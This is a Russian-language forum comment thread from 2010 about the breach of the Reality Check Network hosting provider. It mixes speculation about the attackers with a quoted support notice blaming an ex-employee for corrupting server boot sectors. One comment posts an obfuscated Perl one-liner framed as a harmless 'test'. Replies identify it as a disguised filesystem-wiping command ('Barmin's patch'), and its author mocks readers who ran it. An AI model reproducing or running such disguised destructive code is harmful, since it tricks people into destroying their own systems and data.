axel2001 Oct 17 2010 at 03:53

Взломан хостинг Reality Check Network

1 min

1.2K

Hosting

+35

Comments 47

DangerT Oct 17 2010 at 05:03

Вполне очевидно что это работа каких-то кибер-спецслужб — данная работа им вполне по плечу, поскольку у них наверняка всегда на крючке несколько хакеров, попавшихся на чем-нибудь и удостоенных «чести» отстаивать «интересы нации в киберпространстве» в обмен на свободу. Уж очень направленно выглядит атака.

mikevmk Oct 17 2010 at 06:13

По-моему вы слишком много смотрели телевизор ;)
Хакеры на крючке, кибер-спецслужбы, работа по плечу, обмен на свободу…

DangerT Oct 17 2010 at 06:48

Открою по секрету — комментарий был заказан ЦРУ :)

abrwalk Oct 17 2010 at 15:17

ок отметил у себя, DangerT продажная мусарня

DangerT Oct 17 2010 at 16:13

Грубить и переходить на личности — не лучший способ применения своих умственных способностей. Такие комментарии обычно оставляют незрелые школьники и прочий контингент, чей уровень интеллектуального развития оставляет желать лучшего :)

naryl Oct 17 2010 at 08:20

А ещё взлом может иметь целью вызвать в людях мнение, что это работа кибер-спецслужб.

squint Oct 17 2010 at 09:18

А ваш комментарий может иметь целью заставить людей думать, что этот взлом имел собой целью вызвать в людях мнение что это работа кибер-спецслужб

naryl Oct 17 2010 at 10:12

А ваш комментарий может иметь целью заставить людей думать, что мой комментарий имел целью заставить людей думать, что этот взлом имел целью вызвать в людях мнение что это работа кибер-спецслужб.

setevik Oct 17 2010 at 11:18

Остановитесь! )

DangerT Oct 17 2010 at 16:14

Так можно и до StackOverflowException дописаться :)

AGvin Oct 17 2010 at 06:21

уж очень интересно звучит «повредив при этом их операционные системы»… это как?… у них у всех стояла одна и та же система с одной и той же уязвимостью?… что за бред?!
Я понимаю, снести только пару серваков, но что б ввесь датацентр?!?!

Вот к примеру, как я вижу, на их серваке выдает:
Apache/2.2.3 (CentOS) Server at www.realitychecknetwork.com Port 80

Сомниваюсь, что у них всех стоит та же сборка CentOS, а не дебиан, и др.

Aquahawk Oct 17 2010 at 06:27

вообще было бы бредом ставить разные ОС. Можете конечно сделать 100 серваков на 100 разных сборках, нанять 100 админов и платить им в 100 раз больше. Всегда сколько видел любые полные стойки в них всегда стоят одинаковые до байта, разлитые по сети с одного образа, оси. И это чертовски логично и выгодно по обслуживанию.

ktototam Oct 17 2010 at 19:59

а почему не держать хоть несколько резервных корневых серваков, как раз с разными системами. что бы хоть тот же www.realitychecknetwork.com был в состоянии сейчас выдавать клиентам морду с веселенькой картинкой картинкой и оперативной инфой по аварии?

Aquahawk Oct 18 2010 at 04:16

Нормальные конторы держат резервирование на других платформах, причём даже географически разнося серваки, это вероятно не их уровень.

UFO landed and left these words here

Halt Oct 17 2010 at 08:43

Если наличествует факт удавшейся атаки, то обычно не рискуют. Грамотно заложенные скрипты могут лежать очень глубоко и надежно. Вычистить все в условиях жесткого цейтнота — по меньшей мере самонадеянно. Другое дело, что уже сами бекапы могут быть уже ломанными.

А вообще, не совсем понятен мотив взломщиков. С одной стороны провернуть сложную операцию (а я не сомневаюсь, что эти сервера были надежно защищены) и с другой — так лохануться, засветив все и вся.

Ну либо это была акция конкурентов, в плане черного пиара данного хостинга.

logan Oct 17 2010 at 18:53

Скорее всего акция уже закончена и надо заметать следы. Вот они их и зачистят — руками своих же врагов.

axel2001 Oct 17 2010 at 06:59

Дело не в том, что они нашли какую-то уязвимость в операционной системе, а взломали именно сеть хостинга и возможно через какую-то единую систему управления серверами получили доступ ко всем серверам. А затем «повредили»(что конкретно имеется в виду я не знаю) данные на этих серверах. Поэтому конкретный тип операционной системы тут ни при чем.

jeje Oct 17 2010 at 06:30

Сервера пострадали рандомно, ко многим сейчас закрыт доступ, будет интересно узнать что да как, так как мы их клиенты и теперь недоступны больше половины серверов, на них закрыт ssh, а некоторых и вообще не видно.
ОС которые они использовали CentOS/Fedora.

axel2001 Oct 17 2010 at 07:02

Сочувствую, но глядя на соседей, я бы не стал хоститься на таком хостинге.

jeje Oct 17 2010 at 07:06

Не в моей юрисдикции выбор. Могу только сказать, что при полной поддержке, они хорошо с этим справляются.

jeje Oct 17 2010 at 07:13

+ хостится понятие ведь разное, мы ведь не на одном сервере, у нас сервера свои, что там за соседе на стойке нам все равно :)

lehha Oct 17 2010 at 08:11

Очень странно звучит — это тоже странно. Обычный взлом, кладут сервер и портят записи на винте — чтобы просто не поднимался, либо через recovery.

tundrawolf_kiba Oct 17 2010 at 09:22

вообще вспомнилась недавняя DDoS атака на некий adult сайт, не так давно обсуждавшаяся на хабре — пожет некая группа таким образом пробует свои силы, делает разминку перед какими-то масштабными вещами?

alrond Oct 17 2010 at 09:34

Там до сих пор идет атака, судя по forum.searchengines.ru/showthread.php?t=553217

tundrawolf_kiba Oct 17 2010 at 09:37

не знал, обсуждение помню, тогда писали что атака прекратилась, а как у них сейчас не интересовался, спасибо за информацию)

seriyPS Oct 17 2010 at 12:01

Вычитал там что атака доросла до 300Гб и ее все же смогли отбить какие то антиддосеры

DLag Oct 17 2010 at 14:48

Ничего там не выросло. )))
Просто горе анти-ддосер хочет поднять себе карму после фейла с этой атакой.

jeje Oct 17 2010 at 09:41

ddos в 100ггбит там не особо страшен, зная ширину их канала

axel2001 Oct 17 2010 at 10:27

Я думаю это совершенно не причем.

phasma Oct 17 2010 at 09:42

Желтовато получилось, у чуваков просто бэкдоры через какую-нить уязвимость в php скриптах одного из клиентов. Да, и это были обязательно ZOG/ФСБ/ЦРУ/Цыгане с медведем итд.

jeje Oct 17 2010 at 09:47

Ну бекдор, захватят один сервер, дальше как централизированно все положить?

Die_Gelassenheit Oct 17 2010 at 10:18

Ходили же желтоватые слухи про какой-то передел рынка adult. Может быть, не такие уж и желтоватые?

horses Oct 17 2010 at 10:28

Ну а чего еще можно было ждать, когда хостить столько «неугодных» сайтов?

osj Oct 17 2010 at 10:50

echo «test… test… test...» | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

BSoD Oct 17 2010 at 11:15

Патч Бармина, товарищ? Желаете посмотреть сколько ещё серваков сляжет?

osj Oct 17 2010 at 19:04

минусующие в карму походу попробовали запустить. эх. молодежь.

BSoD Oct 18 2010 at 02:07

Часть анонимусов на ЛОРе тогда тоже не оценили и очень обиделись.

BekoBou Oct 17 2010 at 11:39

Суровый хакер — уборщица с сильным магнитом :)

symbix Oct 17 2010 at 12:15

Бывший админ, небось, обиделся… Такие мощные фейлы — это всегда инсайд.

frol Oct 17 2010 at 17:58

Вот какое сообщение получили от их суппорта:

We've been working on finalizing the restore process and automating it with scripts so that we can get the servers online as rapidly as possible. We are creating work queues and assigning servers to them therefore we will be able to provide a more concrete ETA for restores shortly.

We are also in the process of finalizing agreements that will allow us to increase manpower significantly as well as provide a stable infrastructure when the servers are restored.

In terms of the damage to the servers it was corruption of the MBR and initial sectors on the hard drive. For customers with large attached storage devices your content should be unaffected as it was not part of the primary RAID configuration.

As for the intrusion it was the result of an ex-employee who was with us for three years as a result he had intimate knowledge of our systems which is why the effects are so large.

We have made significant progress on the backend and we feel that we are reaching a point where the recovery process can begin ramping up full force. We will be sending another update soon, and thanks again to everyone for the outpouring of support — we're working as hard and smart as we can to get everyone back online.

Thank you,
Moisey Uretsky
Reality Check Network

axel2001 Oct 18 2010 at 06:47

Вот и прояснилось, как выше заметили, такая атака без вмешательства нынешних или бывших работников маловероятна.

OutLander Oct 18 2010 at 04:33

Многие компании с большим количеством серверов часто используют скрипты синхронизации ключей. Так что скорей всего человек получил доступ к служебному серверу, добавил свой ключик в список и запустил скрип.

detsl Oct 18 2010 at 07:25

torrentfreak.com/major-torrent-sites-go-down-after-attack-on-hosting-provider-101017/
если кому интересно, то в статье и комментариях есть новости…

Yani Oct 18 2010 at 08:29

Что-то слабо я представляю, что «несколько очень крупных adult и торрент (включая torrents.net) сайтов» хостились на веб хостинге, а не имели свои дедики. А если имели свои дедики, то у хостера паролей от них быть не должно.

axel2001 Oct 19 2010 at 17:50

Вы знакомы с понятием managed dedicated servers?
Вы знаете разницу между managed dedicated servers и collocation servers?

Dmitrius Oct 18 2010 at 20:07

Reality Check Network в знаменит в первую очередь своим мощным CDN, список пострадавших сайтов можно посмотреть тут: serversiders.com/as46652

Представители хостинга на закрытом форуме говорят, что взлом был совершён при участии бывшего сотрудника, который имел доступ к конфиденциальным данным по безопасности, отсюда и масштабы.